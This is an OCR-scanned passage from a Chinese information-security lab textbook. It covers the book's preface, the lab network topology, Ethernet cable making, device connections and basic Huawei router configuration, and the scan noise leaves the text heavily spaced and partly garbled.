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目前 ， 国 内 有 近 百 所 高 校 都 设 有 密码 学 、 信 息 安全 或 信息 对 抗 专业 ， 许 
多 高 校 已 建 有 信息 安全 实验 室 , 并 系统 地 开设 了 信息 安全 实验 课程 。 虽然 现 
有 的 信息 安全 实验 书籍 很 多 , 但 大 多 数 教材 的 内 容 缺乏 系统 性 ,尤其 从 本 科 
教学 的 角度 看 ， 它 们 都 不 太 适 合作 为 信息 安全 实验 教材 。 

本 教材 从 网 络 安全 课程 教学 体系 出 发 , 在 实验 内 容 编 排 上 ,力求 符合 
育 部 信息 安全 类 专业 教学 指导 委员 会 制订 的 《信息 安全 专业 指导 性 专业 规 
范 》， 满 足 该 规范 对 信息 安全 专业 本 科 生 实践 能 力 体 系 的 要 求 。 本 教材 将 网 
络 安 全 实验 内 容 划 分 为 “基本 型 实验 、 综合 型 实验 、 创新 型 实验 ”三 个 层次 ， 
由 浅 入 深 ， 由 易 到 难 ， 由 简单 到 综合 ， 再 由 综合 到 创新 ， 则 在 逐步 培养 学 生 
的 创新 意识 和 创新 能 

本 书 是 一 本 内 容 丰 富 、 特 色 鲜 明 、 实 用 性 强 的 信息 系统 安全 实验 教材 。 
该 教材 不 仅 包含 了 实验 环境 搭建 和 密码 学 基本 算法 的 实验 , 还 针对 主流 的 操 
作 系 统 如 Windows、Linux 等 设置 了 易于 理解 掌握 的 系统 安全 实验 ， 为 了 增 
强 读者 对 整个 安全 系统 的 掌握 理解 , 本 书 特别 增加 了 常用 数据 库 的 安全 实验 
和 服务 器 的 相关 实验 。 此 外 , 本 教材 还 针对 几 种 常见 的 恶意 代码 的 处 理 方法 
设置 了 相关 实验 ， 力 求 使 读者 能 对 整个 系统 安全 有 更 加 系统 性 的 了 解 和 掌 
握 。 最 后 ， 本 教材 还 针对 嵌入 式 系统 应 用 普及 的 现状 ， 专 门 设置 了 嵌入 式 系 
统 安全 的 有 关 实 验 。 在 每 个 实验 的 后 面 均 附 有 实验 报告 和 思考 题 , 便于 读者 
对 实验 过 程 和 结果 进行 分 析 和 总 结 ， 并 对 所 提出 的 问题 进行 深入 思考 。 

全 书 共 分 3 篇 13 章 。 第 1 篇 为 计算 机 网 络 基 础 篇 ， 由 第 1 章 和 第 2 章 
构成 ， 主 要 包括 信息 安全 实验 室 网 络 环境 建设 、 网 络 设备 配置 及 必 备 基础 知 
识 等 实验 内 容 ; 第 2 篇 为 密码 学 篇 ， 由 第 3 一 7 章 构 成 ， 主 要 包括 对 称 密码 
算法 、 公 钥 密 码 算法 、 杂 凑 算 法 、 数 字 签 名 算法 以 及 常用 密码 软件 工具 使 用 
等 实验 内 容 ; 第 3 篇 为 系统 安全 篇 ， 由 第 8 一 13 章 构 成 。 第 8 章 和 第 9 章 为 
主流 操作 系统 的 系统 安全 实验 , 第 10 章 和 第 11 章 为 主流 数据 库 及 服务 器 安 
全 的 相关 安全 实验 ， 第 12 章 为 常见 恶意 代码 的 处 理 实验 , 第 13 章 为 嵌入 式 
系统 安全 实验 。 

本 书 不 但 可 以 作为 密码 学 、 信 息 安 全 、 信 息 对 抗 等 专业 的 本 科 生 、 硕 士 
生 和 博士 生 专业 课程 配套 实验 教材 , 而 且 也 可 以 作为 信息 安全 工程 师 的 培训 
教材 。 
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1.1.1 实验 室 网 络 拓扑 结构 


信息 安全 实验 室 的 硬件 系统 包括 : 
e 防火 墙 ; 

e 网 络 入 侵 检测 系统 (NIDS ); 
e 虚拟 专用 网 络 (VPN); 

e 物理 隔离 网 卡 ; 

ee 路由器; 

e 交换 机 ; 

e 集线器 。 

信息 安全 实验 室 的 软件 系统 包括 : 
e 脆弱 性 扫描 系统 ; 

。 病毒 防护 系统 ; 

e 身份 认证 系统 ; 

e 网 络 攻防 软件 ; 

e 主机 入 侵 检 测 软件 ; 

e 因特网 非法 外 联 监 控 软件 。 
信息 安全 实验 室 的 网 络 拓 扑 结 构 如 图 1-1 所 示 。 


1.1.2 ”实例 介绍 


在 实验 室 网 络 拓扑 结构 中 ， 一 个 局 域 网 的 主机 IP 地 址 可 按照 图 1-2 设置 ， 另 外 两 个 
网 络 中 主机 的 耳 地址 则 按照 192.168.2.11 一 192.168.2.20 和 192.168.3.11 一 192.168.3.20 来 
设置 。 注 意 : 一 个 局 域 网 中 的 主机 数量 可 以 根据 学 生 分 组 人 数 的 多 少 来 设计 。 在 本 网 络 
安全 方案 设计 中 ， 假 设 一 个 班 有 30 名 学 生 ， 分 为 三 组 ， 每 组 10 人。 如 果 学 生 人 数 比 较 
多 ， 可 以 适当 地 增加 每 个 局 域 网 中 主机 的 数目 ， 或 者 增加 局 域 网 的 个 数 。 当 然 ， 这 需要 
增加 设备 和 投资 。 
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192.168.1.11~192.168.1.20 


图 1-2 子 网 络 IP 地址 设置 


‘12 网 络 综合 布线 


1.2.1 ”网 线 制作 


日 前 局 域 网 构建 已 经 极为 普遍 ， 小 型 局 域 网 无 处 不 在 ， 例 如 家 庭 局 域 网 、 网 吧 、 校 
园 局 域 网 和 小 型 办 公 网 等 。 在 搭建 网 络 的 时 候 ， 网 线 的 制作 是 需要 掌握 的 最 基本 技能 。 
网 线 制作 的 整个 过 程 都 要 准确 到 位 ， 排 序 的 错误 和 压制 的 不 到 位 都 将 直接 影响 网 线 的 使 
用 ， 导 致 网 络 不 通 或 者 网 速 缓慢 。 

超 五 类 线 是 网 络 布线 最 常用 的 网 线 ， 分 为 屏蔽 和 非 屏蔽 两 种 。 如 果 是 室外 使 用 ， 屏 
蔽 线 更 合适 ; 如 果 是 在 室内 使 用 ， 一 般 用 非 屏蔽 五 类 线 就 够 了 。 由 于 此 类 线 不 带 屏蔽 层 ， 
线 缆 会 相对 柔软 些 ， 但 其 连接 方法 都 是 一 样 的 。 一 般 的 超 五 类 线 里 都 有 4 对 绞 在 一 起 的 
细 线 ， 并 用 不 同 的 颜色 标明 。 

双 绞 线 一 般 用 于 星 状 网 络 的 布线 ， 每 条 双 绞 线 通 过 两 端 安 装 的 RJ-45 连接 器 (俗称 
水 晶 头 ) 将 各 种 网 络 设备 连接 起 来 。 双 绞 线 的 标准 接 法 不 是 随便 规定 的 ， 目 的 是 保证 线 
缆 接 头 布局 的 对 称 性 ， 这 样 就 可 以 使 接头 内 线 缆 之 间 的 干扰 相互 抵消 。 双 绞 线 有 两 种 接 
法 : EIA/TIA 568B(T568B) 标准 和 EIA/TIA 568A〈(T568A) 标准 。 两 种 标准 的 线 序 如 
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表 1-1 所 示 。 


表 1-1 T568A 标准 和 T568B 标准 线 序 表 


制作 网 线 时 ， 如 果 不 按 标准 连接 ， 虽 然 有 时 线路 也 能 接 通 ， 但 是 线路 内 部 各 线 对 之 
间 的 干扰 不 能 有 效 消除 ， 从 而 导致 信号 传送 出 错 率 升 高 ， 最 终 影响 网 络 整体 性 能 。 只 有 
按 规范 标准 建设 ， 才 能 保证 网 络 的 正常 运行 ， 也 会 给 后 期 的 维护 工作 带 来 便利 。 

直通 线 〈 也 叫 作 正 线 ) 两 头 都 按 T568B 线 序 标准 连接 。 直 通 线 的 两 端 线 序 一 样 ， 即 
从 左 至 右 线 序 是 白 橙 、 橙 、 白 绿 、 蓝 、 白 蓝 、 绿 、 白 棕 、 棕 。 交 叉 线 〈 也 叫 作 反 线 ) 一 
头 按 T568A 线 序 连 接 ， 一 头 按 T568B 线 序 连 接 。 交 叉 线 的 制作 方法 与 直通 线 相同 。 

下 面 介绍 制作 直通 网 线 的 步骤 。 

(1) 剪断 : 利用 压 线 钳 的 剪 线 刀 口 前 取 适 当 长 度 的 网 线 。 截 取 双 绞 线 长 度 至 少 为 
0.6m， 最 多 不 超过 100m。 

(2) 剥皮 : 用 压 线 钳 的 剪 线 刀 口 将 线头 剪 齐 ， 再 将 线头 放 入 和 剥 线 刀 口 ， 让 线头 触及 
挡 板 ， 调 整 好 长 度 ， 稍 微 握 紧 压 线 钳 慢 慢 旋转 ， 让 刀口 划 开 双 绞 线 的 保护 胶皮 ， 拔 下 
胶皮 。 

(3) 排序 : 剥 除 外 包皮 后 即 可 见 到 双 绞 线 网 线 的 4 对 8 条 芯 线 ， 按 照 规定 的 线 序 排 
列 整齐 。 

(4) 前 齐 : 把 线 尽 量 指 直 《不 要 缠绕 )、 压 平 〈 不 要 重 登 )、 挤 紧 理 顺 〈 朝 一 个 方向 
紧 靠 )， 然后 用 压 线 钳 把 线头 前 平 齐 。 外 层 去 掉 外 层 绝缘 皮 的 部 分 约 为 14mm， 这 个 长 度 
正好 能 将 各 细 导 线 插入 到 各 自 的 线 槽 。 如 果 该 段 留 得 过 长 ， 一 来 会 由 于 线 对 不 再 互 绞 而 
增加 串扰 ， 二 来 会 由 于 水 晶 头 不 能 压 住 护 套 而 可 能 导致 电缆 从 水 晶 头 中 脱出 ， 造 成 线路 
的 接触 不 良 甚至 中 断 。 

(5) 插入 : 一 只 手 以 拇指 和 中 指 捏 住 水 晶 头 ， 使 有 塑料 弹片 的 一 侧 向 下 ， 针 脚 一 方 
朝向 远离 自己 的 方向 ， 并 用 食指 抵 住 ， 另 一 只 手 捏 住 双 绞 线 外 面 的 胶皮 ， 缓 组 用 力 将 8 
条 导线 同时 沿 RJ-45 头 内 的 8 个 线 槽 插入 ， 一 直 插 到 线 槽 的 顶端 。 

(6) 压制 : 确认 所 有 导线 都 到 位 ， 并 透视 水 晶 头 检查 一 遍 线 序 无 误 后 ， 就 可 以 用 压 
线 钳 压制 RJ-45 头 了 。 将 RJ-45 头 从 无 牙 的 一 侧 推 入 压 线 钳 夹 槽 后 ， 用 力 握 紧 线 钳 〈 如 
果 力 气 不 够 大 可 以 使 用 双手 一 起 压 )， 将 突出 在 外 面 的 针脚 全 部 压 入 水 晶 头 内 。 

(7) 测试 : 把 水 晶 头 的 两 端 都 做 好 后 即 可 用 网 线 测试 仪 进行 测试 ， 如 果 测 试 仪 上 8 个 
指示 灯 都 依次 为 绿色 闪 过 ， 证 明 网 线 制 作成 功 。 如 果 是 直通 线 ， 测 试 仪 上 的 灯 应 该 是 依次 
顺序 闪 亮 ， 如 果 做 的 是 交叉 线 ， 那 么 测试 仪 的 闪 亮 顺序 应 该 是 3、6、1、4、5、2、7、8。 

另外 ， 在 购买 双 绞 线 时 请 注意 : 应 该 选用 的 是 五 类 双 绞 线 。 三 类 线 的 传输 距离 只 能 

达到 16m， 四 类 线 只 能 达到 20m， 只 有 五 类 线 以 及 超 五 类 线 等 才能 到 达 100m。 
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在 布线 时 ， 要 注意 ; 对 每 条 网 线 要 采用 号 卡子 〈 一 种 塑料 卡子 ) 在 网 线 的 两 头 做 适 
当 标 识 。 可 以 按照 局 域 网 和 分 组 进行 编号 。 例 如 ， 若 网 线 连接 的 是 第 一 个 局 域 网 的 第 5 
台 主 机 , 那么 可 以 在 网 线 两 头 的 线 卡 子 上 编号 为 A5。 这 样 , 可 以 保证 网 线 不 会 出 现 混乱 ， 
且 便 于 查找 故障 。 

在 机 柜 中 ， 各 设备 之 间 的 连 线 也 要 采用 恰当 的 标识 加 以 区 分 。 实 验 室 工作 人 员 可 以 
根据 具体 情况 自行 设计 编号 。 


1.2.2 设备 连接 


1. 网 卡 与 网 卡 

网 卡 之 间 直 接连 接 ， 可 以 不 用 集线器 (Hub)， 应 采用 交叉 线 连接 。 

2. 网 卡 与 光 收 发 模块 

将 网 卡 装 在 计算 机 上 ,做 好 设置 ; 给 收发 器 接 上 电源 ， 严 格 按照 说 明 书 的 要 求 操作 ; 
用 双 绞 线 把 计算 机 和 收发 器 连接 起 来 ， 双 绞 线 应 为 交叉 线 接 法 ， 用 光 跳 线 把 两 个 收发 器 
连接 起 来 ， 如 收发 器 为 单 模 ， 跳 线 也 应 用 单 模 的 。 光 跳 线 连接 时 ， 一 端 接 RX， 另 一 端 
接 TIX， 如 此 交叉 连接 。 不 过 现在 很 多 光 模块 都 有 调控 功能 ， 交 叉 线 和 直通 线 都 可 以 用 。 
光纤 收发 器 基本 网 络 连接 如 图 1-3 所 示 。 
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图 1-3 光纤 收发 器 基本 网 络 连接 图 


3. 光 收 发 模块 与 交换 机 

当 用 双 绞 线 把 计算 机 和 收发 器 连接 起 来 时 ， 采 用 直通 线 连接 。 

4. 网 卡 与 交换 机 

当 网 卡 与 交换 机 相连 时 , 采用 直通 线 连 接 。 含 有 网 卡 的 设备 包括 PC、VPN、 防 火 墙 ， 
入 侵 检测 系统 、 路 由 器 等 设备 。 

5. 集线器 与 集线器 〈 交 换 机 与 交换 机 ) 

当 两 台 集 线 器 或 交换 机 〉 通 过 双 绞 线 级 联 时 ， 必 须要 用 交叉 线 。 这 种 情况 适用 于 
那些 没有 标明 专用 级 联 端 口 的 集线器 之 间 的 连接 。 但 是 ， 有 许多 集线器 为 了 方便 用 户 ， 
提供 了 一 个 专门 用 来 串 接 到 另 一 台 集 线 器 的 端口 。 在 对 此 类 集线器 进行 级 联 时 ， 应 采用 
直通 线 连接 。 

6. 交换 机 与 集线器 

交换 机 与 集线器 之 间 也 可 通过 级 联 的 方式 进行 连接 。 级 联通 常 是 解决 不 同 品牌 的 交 
换 机 之 间 以 及 交换 机 与 集线器 之 问 连接 的 有 效 手 段 。 
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7. VPN 和 防火 墙 ，VPN 和 路 由 器 ， 防 火 墙 与 路 由 器 

它们 之 间 的 连接 与 PC 之 间 连 接 类 似 ， 使 用 交叉 线 。 

8. 计算 机 串口 与 路 由 器 /交换 机 /防火 墙 /VPN 等 设备 的 RJ-45 控制 口 连接 

当 采 用 计算 机 的 串口 对 以 上 网 络 设备 进行 管理 时 ， 需 要 在 PC 的 串口 上 安装 一 个 串 
口 /RJ-45 转换 器 。 这 样 , 就 可 以 采用 一 条 直通 线 连 接 PC 和 网 络 设备 的 RJ-45 控制 口 。 注 


意 : 串 


/RJ-45 转换 器 的 引 脚 线 序 排列 有 可 能 不 同 。 各 设备 随机 附件 中 提供 的 串口 /RJT-45 


转换 器 可 能 不 同 。 因 此 ， 在 设备 安装 时 ， 切 记 不 要 把 这 些 串口 /RJ-45 转换 器 张冠李戴 。 
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24 路 由 器 


简单 地 说 ， 路 由 器 的 基本 作用 就 是 使 处 于 不 同 网 段 的 主机 之 间 可 以 相互 通信 。 

路 由 器 工作 在 OSI 参考 模型 的 第 三 层 。 其 主要 功能 是 执行 特定 的 路 由 算法 ， 为 网 络 
中 传输 的 数据 包 提 供 从 源 节 点 到 目的 节点 的 路 径 。 同 时， 路 由 器 通过 网 络 层 的 IP 地 址 来 
区 分 不 同 的 网 络 ， 达 到 网 络 互 联 和 隔离 的 目的 。 路 由 器 只 根据 卫 地 址 来 转发 数据 ， 只 要 
网 络 层 运行 的 是 卫 协议 ， 不 同类 型 的 网 络 也 可 以 通过 路 由 器 互联 起 来 。 

IP 地 址 是 与 硬件 地 址 (MAC) 无 关 的 逻辑 地 址 。 两 者 之 间 通 过 ARP 实现 映射 。IP 
地 址 由 两 部 分 组 成 : 一 部 分 定义 了 网 络 号 ， 另 一 部 分 定义 了 网 络 内 的 主机 号 。 两 部 分 结 
合 起 来 ， 构 成 一 个 完整 的 IP 地 址 。 

通信 只 能 在 具有 相同 网 络 号 的 IP 地 址 之 间 进 行 ,要 与 其 他 网 络 的 主机 通信 ， 则 必须 
经 过 同一 网 络 上 的 某 个 路 由 器 或 网 关 。 不 同 网 络 号 的 IP 地 址 不 能 直接 通信 ， 即 使 它们 连 
接 在 一 起 ， 也 不 能 直接 通信 。 路 由 器 在 网 络 中 扮演 着 桥梁 的 角色 。 

路 由 器 实质 上 是 一 台 微 型 计算 机 ， 主 要 由 以 下 儿 个 部 分 组 成 。 

e 中 央 处 理 器 (CPU); 

。 操作 系统 ; 
e 内 部 随机 存储 器 (RAM); 
e 闪存 (FLASH MEMORY 用 来 存储 路 由 器 操作 系统 ); 
e。 非 易 失 性 随机 访问 存储 器 (NVRAM 用 来 存储 路 由 器 配置 文件 )。 

一 般 商 用 路 由 器 没有 磁盘 驱动 器 、 键 盘 、 显 示 器 。 配 置 路 由 器 的 一 种 方法 是 将 路 由 
器 连接 在 PC 上 ， 通 过 超级 终端 对 它 进行 配置 。 

2.1.1 路 由 器 配置 

【实验 目的 】 

(1) 路 由 器 在 网 络 中 存在 的 意义 及 重要 性 。 

(2) 使 用 Windows 中 的 超级 终端 (hyperterminal〉 配 置 路 由 器 。 

(3) 掌握 路 由 器 配置 的 基本 命令 。 


【原理 简介 】 
本 章 以 华为 路 由 器 为 例 来 演示 路 由 器 的 配置 与 工作 过 程 。 


本 实验 所 使 用 的 是 华为 Quidway R2811 路 由 器 的 正视 图 ， 如 图 2-1 所 示 。 其 后 视图 
如 图 2-2 所 示 。 


图 2-1 Quidway R2811 路 由 器 的 正视 图 
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图 2-2 Quidway R2811 路 由 器 的 后 视图 


可 以 看 到 标识 着 LAN0 和 LANI 的 局 域 网 接口 ， 标 识 着 WAN 的 广域网 接口 ， 还 有 
AUX 接口 和 Console (在 路 由 器 面板 上 简写 为 CON ) 接口 。 

下 面 介绍 这 些 接口 的 作用 。 

(1) LAN 接口 : 使 用 RJ-45 水 晶 头 和 双 绞 线 的 以 太 网 接口 。 

(2) WAN 接口 : 是 广域网 接口 的 一 种 ， 也 是 应 用 最 多 的 一 种 高 速 同 步 串 口 
(CSerial)。 这 种 端口 主要 用 来 与 目前 广泛 应 用 的 DDN、 帧 中 继 、X.25 等 广域网 设备 进行 
专线 连接 。 一 般 来 说 , 通过 这 种 端口 所 连接 的 网 络 两 端 要 求实 时 同步 ， 所 以 速率 非常 高 ， 
如 图 2-3 所 示 。 


WAN 接 口 
图 2-3 广域网 接口 


(3) AUX 端口 : AUX 端口 为 异步 接口 ， 主 要 用 于 远程 配置 ， 也 可 以 用 来 拨号 连接 ， 
还 可 以 通过 收发 器 与 Modem 进行 连接 。 路 由 器 通常 同时 提供 AUX 接口 与 Console 接口 。 
(4) Console (CON) 端口 : Console 端口 使 用 配置 专用 连 线 直 接连 接 计 算 机 的 串口 ， 
终端 仿真 程序 (如 Windows 的 “超级 终端 ") 进行 路 由 器 配置 。 路 由 器 的 Console 
端口 多 为 RJ-45 接口 。 如 果 Console 端口 为 RJ-45 接口 ， 请 直接 采用 直通 线 连接 至 一 台 
PC 的 串口 。 此 时 ， 在 PC 的 串口 上 要 安装 一 个 串口 /RJ-45 转换 器 。 

当然 ， 路 由 器 上 不 仅 有 这 些 接口 ， 还 有 AUI 接口 、 光 纤 接 口 、 异 步 串 行 接口 等 。 如 
果 读 者 感 兴趣 ， 可 以 自己 查找 资料 了 解 其 他 接口 的 作用 。 

【实验 环境 】 

本 次 实验 使 用 以 下 设备 。 

(1) 一 台 华 为 Quidway R2811 路 由 器 。 


尝 
这 
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(2) 一 台 PC 或 笔记 本 。 

(3) 一 条 连接 PC 串 行 端口 和 路 由 器 Console 的 网 线 。 
(4) 一 个 串口 /RJ-45 转换 器 。 

具体 的 连接 示意 图 如 图 2-4 所 示 。 


串口 /RJ-45 转 换 器 
-加 
图 2-4 路 由 器 的 Console 端口 与 PC 串口 的 连接 示意 图 


【实验 步骤 】 

(1) 观察 和 记录 给 定型 号 路 由 器 的 端口 。 

(2) 使 用 线 缆 正 确 连接 路 由 器 和 PC。 

(3) 配置 超级 终端 。 

@ 启动 计算 机 ， 单 击 【 开 始 】| 【程序 】|【 附 
件 】| 【通信 】| 【超级 终端 】。 

@ 为 本 次 连接 起 一 个 名 字 ， 比 如 “Router”， 
如 图 2-5 所 示 。 

@@ 单 击 【确定 】 按钮 , 选择 串口 COMI1 端口 ， 


如 图 2-6 所 示 。 
> 3 帮 连接 
@ 单 击 【确定 】 按 钮 ， 出 现 【COMI 属性 】 图 2-5 新 建 连接 Router 
对 话 框 ， 数 据 设 置 如 图 2-7 所 示 。 
了 到 
CCT3 
连接 到 | 设置 | 天 一 | 
[SL 
国家 GW 区 ) C): [KFRE GD 二] 3 国 
输入 不 带 长 途 前 早 的 区 号 。 SEEUh 
区 号 @) se 
电话 S39: 坷 全 裤 验 :| 无 | 
| ft 可 
配置 EE) 
也 使 用 国家 ( 纯 区 ) 代 码 和 区 号 人 数据 流 控 制 于) [3 
夺目 总 及 重 披 括 ) 


还 原 为 默认 值 E) 


my | mw | 
图 2-6 选择 端口 图 2-7 串口 参数 设置 


ee 信息 系统 安全 实验 教程 ww] 到 


单 击 【确定 】 按 钮 ， 超 级 终端 的 基本 配置 就 完成 了 。 

(4) 路 由 器 配置 。 

一 般 情况 下 配置 路 由 器 的 基本 思路 如 下 : 在 配置 路 由 器 之 前 ， 需 要 将 组 网 需求 具体 
化 、 详 细 化 ， 包 括 组 网 目的 、 路 由 器 在 网 络 互联 中 的 角色 、 子 网 的 划分 、 广 域 网 类 型 和 
传输 介质 的 选择 、 网 络 的 安全 策略 和 网 络 可 靠 性 需求 等 ， 然 后 根据 以 上 要 素 绘 出 一 个 清 
晰 完整 的 组 网 图 。 

Quidway AR28 系列 路 由 器 向 用 户 提 供 命 令 行 接口 ,通过 这 些 命 令 来 配置 和 管理 路 由 
器 ， 命 令 行 接口 有 如 下 特点 。 

e 通过 CON 端口 进行 本 地 配置 。 
通过 Telnet 进行 本 地 或 远程 配置 ， 用 Telnet 命令 直接 登录 并 管理 其 他 路 由 器 。 

用 户 可 以 随时 输入 “? ”而 获得 在 线 帮助 。 

提供 全 中 文 的 提示 和 帮助 信息 。 

提供 网 络 测试 工具 ， 如 tracert、ping 等 ， 迅 速 诊断 网 络 的 可 达 性 。 
提供 种 类 丰富 、 内 容 详 尽 的 调试 信息 ， 帮 助 诊断 网 络 故障 。 

命令 行 解释 器 对 关键 字 采 取 不 完全 匹配 的 搜索 方法 ， 如 命令 display， 输 入 dis 
即 可 。 

路 由 器 配置 步骤 如 下 。 

@ 确认 线 缆 连接 正确 和 超级 终端 配置 无 误 。 

@ 给 路 由 器 加 电 。 超 级 终端 的 输出 如 图 2-8 所 示 。 


Router 
文件 他 ) cr EEC 


DB| 可 | 可 | ai 加 | 可 | 


* Copyvright{c) 1998-2886 Huawei Technologies Co., Ltd. All rights reserved. * 
* Hithout the owner's prior written consent, 


* no decompiling or reverse-engineering shall be allowed 


User interface conf is available. 


Please press ENTER . 


<Quidway> 
i 16 jl 11:21:721 2807 Quidway SHELL/S/LOGIN: Console login from cong 
<Quidwa 


| 局 二 045 [四 动 性 出 “BID IIri EEC [5 pu | 记 站 有 


图 2-8 启动 界面 


@ 等 待 片刻 后 , 便 可 以 对 路 由 器 进行 配置 了 。 当 屏幕 中 出 现 Press Ctrl-B to enter Boot 
Menu HL Press ENTER key to get start when you see ATS0=1 还 没有 出 现 前 ， 按 Ctrl+B 键 ， 
则 可 以 进入 引导 模式 ， 如 图 2-9 所 示 。 


要 


EECEE] 
立 伞 到 所 辑 全 】 殖 看 QI 呼 8 他 传 注 侣 帮助 
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Dl] 可 | 可 | 3al 到 


Testing memory. . .0K1 

128N bytes SDRAM 
32768k bytes flash nemory 
Hardware Version is 0 
CPLD Version is CPLD 1. 


Press Ctrl-B to enter Boot Henu 
Please input Bootrom password: 


Boot Menu: 

Set application file type, 

: Display applications in Flash 
Reset console authentication 


Enter debugging environment 
Boot Rom Operation Menu 


ns 


it and reboot 
Enier vour choice{1-b): 


Copyright (c) 1998-2885 Huawei Technologies Co., Ltd 


Download application progran with ugDEN 
Download application program with NET 


Clear application super password 


Start up and.ignore.configurati 


Do mot check the version of the software 


ion 


eM 丰 ， 


图 2-9 进入 引导 模式 
@ 若 没有 设置 密码 ， 便 可 直接 按 回 车 键 。 然 后 可 以 看 到 引导 菜单 。 


在 图 2-9 中 有 如 下 选项 。 
1: 


: Boot Rom operation menu (从 Rom 操作 菜 
: Do not check the version of the software (不 
b: Exit and reboot (退出 并 重 起 ) 

如 果 以 前 有 人 配置 过 这 人 台 路 由 器 ， 那 么 
启动 路 由 器 让 它 直 接 进 入 配置 模式 。 


PRDoo~ 人 ww 上 wm 


Download application program with XMODEM (使 用 XMODEM 下 载 应 用 程序 ) 
: Download application program with NET (使 用 NET 下 载 应 用 程序 ) 

: Set application file type《〈 设 置 应 用 文件 类 型 ) 

: Display applications in Flash〈 显 示 闪 存 中 的 应 用 程序 ) 

: Clear application super password (清除 应 用 的 超级 口令 ) 

: Reset console authentication〈 复 位 控制 口 认证 ) 

: Start up and ignore configuration〔 启 动 设备 且 不 按照 当前 配置 运行 
: Enter debugging environment (进入 调试 环境 ) 


用 


单 引 导 ) 
检查 软件 的 版 本 ) 


可 以 选 7， 来 清除 配置 文件 ， 然后 选 b， 重 新 


加 当 出 现 Proceed with router configuration? [yes]: 时 ， 输 入 no 跳 过 初始 配置 。 之 后 
可 以 看 到 命令 提示 符 : [Router]， 这 样 就 进入 了 路 由 器 的 配置 模式 。 


(5) 基本 命令 。 

Quidway AR28 系列 路 
为 了 方便 月 
的 视图 之 间 切 换 。 一 般 情况 下 ， 在 某 个 视图 下 只 鲁 


(如 ping、display current configuration、interface 等 ) 在 各 种 视图 下 均 可 执行 。 在 人 


器 的 命令 行 接口 提供 了 丰富 的 配置 命令 。 
有 户 管理 路 由 器 ， 又 将 全 部 命令 分 组 ， 每 组 对 应 一 个 视图 ， 可 以 用 命令 在 不 同 


在 系统 视图 之 下 ， 


已 
[2 


执行 限定 的 命令 ， 但 对 一 些 常用 命令 
E 何 视 


图 下 ， 如 果 需 要 得 到 帮助 ,或 者 查看 系统 支持 的 命令 ,只 需 输入 “? ”后 按 回 车 键 即 可 ， 
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路 由 器 就 会 显示 目前 视图 下 所 支持 的 命令 ， 如 图 2-10 所 示 。 


-= 加 区 
文件 四 编 独 外 可 看 WD 呼叫 C) 传送 中 帮助 如 
DlB| 到 S| el| 到 
司 
clock Specify the system clock 
copy Copy from one file to another 
debugging Enable system debugging functions 
delete Delete a file 
dialer Dialer disconnect 
dir List files on a file system 
display Display current system information 
fixdisk Recover lost chains in storage devic 
tormat Format the device 
free Clear user terminal interface 
ftp Dpen FTP connection 
hwtacacs Specify HWTACACS server 


language-mode Specify the language environment 
lock Lock current user terminal interface 


log Settings of startup configuration Io¢ 
looptest Send packets for loopback test 

mkdir Create a new directory . 

more Display the contents of a file 

move Move a file 

msdp-tracert MSDP traceroute to source RP 
mtracert Trace route to multicast source 
nslookup Query Internet name servers 

pad H Establish one PAD connection 

一 一 es 一 一 


pee er ps a MT 
图 2-10 系统 命令 


(6) 观察 上 述 命令 的 结果 ， 并 填写 实验 报告 。 
@ 使 用 display version 命令 ， 观 察 输 出 ， 填 写 表 2-1。 
表 2-1 路 由 器 版 本 信息 
路 由 器 操作 系统 平台 版 本 
处 理 器 型 号 
路 由 器 序列 号 
SDRAM 大 小 
FLASH 大 小 
NVRAM 大 小 
硬件 版 本 号 
AUX 硬件 版 本 号 


@ 使 用 display current-configuration 命令 ， 观 察 输出 ， 填 写 表 2-2。 
表 2-2 路 由 器 基本 配置 
目前 配置 版 本 号 
防火 墙 是 否 启 动 
列 出 所 有 端口 


@ 使 用 display interface ethernet0 和 display interface serial0 命令 ， 观 察 输出 ， 填 写 
表 2-3。 
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表 2-3 网络 接口 信息 
以 太 网 0 接口 (E0) 是 否 开启 
以 太 网 0 接口 线路 协议 是 否 开启 
以 太 网 0 接口 的 硬件 地 址 
以 太 网 0 接口 是 否 全 双 工 
以 太 网 0 接口 传输 速度 
以 太 网 0 接口 最 大 传输 单元 


@ 使 用 language 命令 改变 提示 语言 并 再 次 使 用 上 述 命 令 display version、display 
current-configuration、display interface ethernet0 和 display interface serial0 命令 , 观察 输出 
有 什么 不 同 。 并 检查 上 述 表 格 是 否 填 写 正确 。 

@ 使 用 “? ”帮助 命令 ， 观 察 输出 。 

e 找到 【路 由 信息 协议 】 的 命令 。 

。 找到 【将 当前 配置 参数 保存 至 FLASH 或 NVRAM 中 】 的 命令 。 

e 找到 【配置 地 址 转换 】 的 命令 。 


【实验 报告 】 

。 简 述 路 由 器 的 常见 端口 及 作用 。 

e 简 述 超级 终端 的 作用 及 本 次 实验 的 具体 配置 参数 。 
e 填写 上 面 的 表格 。 


【思考 题 】 
路 由 器 配置 过 程 中 ， 如 果 某 条 命令 需要 删除 ， 如 何 处 理 ? 


2.1.2 多 路 由 器 连接 


【实验 目的 】 
在 实验 中 ， 通 过 正确 配置 ， 建 立 三 台 路 由 器 之 间 的 相互 连接 ， 构 成 一 个 小 型 互联 网 
络 。 要 求 读者 掌握 常见 的 路 由 器 配置 命令 和 网 络 互联 的 基本 原理 。 


【原理 简介 】 

子 网 掩 码 : 用 于 辨别 IP 地 址 中 哪 部 分 为 网 络 地 址 ， 哪 部 分 为 主机 地 址 ， 由 1 和 0 组 
成 ， 长 32b， 全 为 1 的 位 代表 网 络 号 。 不 是 所 有 的 网 络 都 需要 子 网 ， 因 此 就 引入 一 个 概 
念 。 默 认 子 网 掩 码 (Default Subnet Mask)，A 类 IP 地 址 的 默认 子 网 掩 码 为 255.0.0.0; B 
类 的 为 255.255.0.0; C 类 的 为 255.255.255.0。 当 然 ， 还 有 其 他 形式 的 子 网 掩 码 ， 例 如 ， 
在 C 类 IP 地址 里 边 ， 最 后 8b 是 主机 号 ， 可 以 拿 出 高 nb 作为 子 网 号 ， 而 余下 的 8-nb 作 
为 主机 号 来 得 到 其 他 形式 的 子 网 掩 码 。 例 如 255.255.255.128 (0xFF.FF.FF.80)， 即 最 后 
7b 为 主机 号 。 

在 一 个 网 段 内 的 主机 之 间 可 以 自由 通信 (只 要 物理 连接 完好 ), 而 不 同 网 段 之 间 的 主 
机 通信 则 要 借助 于 其 他 网 络 设备 ， 路 由 器 或 三 层 交 换 机 。 
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【实验 环境 】 
三 台 路 由 器 分 别 命名 为 RouterA、RouterB 和 RouterC。 将 它们 用 交叉 线 (如 图 2-11 


所 示 ) 连接 起 来 。RouterA 和 RouterB 的 E0 接口 处 于 192.168.1.0/24 这 个 网 段 ，RouterA 
